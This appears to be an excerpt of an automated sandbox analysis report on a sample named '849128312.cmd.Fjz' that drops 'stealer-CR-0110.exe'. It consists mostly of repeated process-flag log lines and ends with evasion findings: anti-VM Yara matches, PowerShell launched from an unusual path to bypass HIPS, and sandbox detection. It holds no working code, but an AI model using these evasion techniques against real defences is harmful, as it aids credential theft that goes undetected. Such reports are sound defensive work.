Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealer-CR-0110.exe PID: 6396, type: MEMORYSTR

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\desktop\849128312.cmd.fjz

Key value queried: Powershell behavior

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

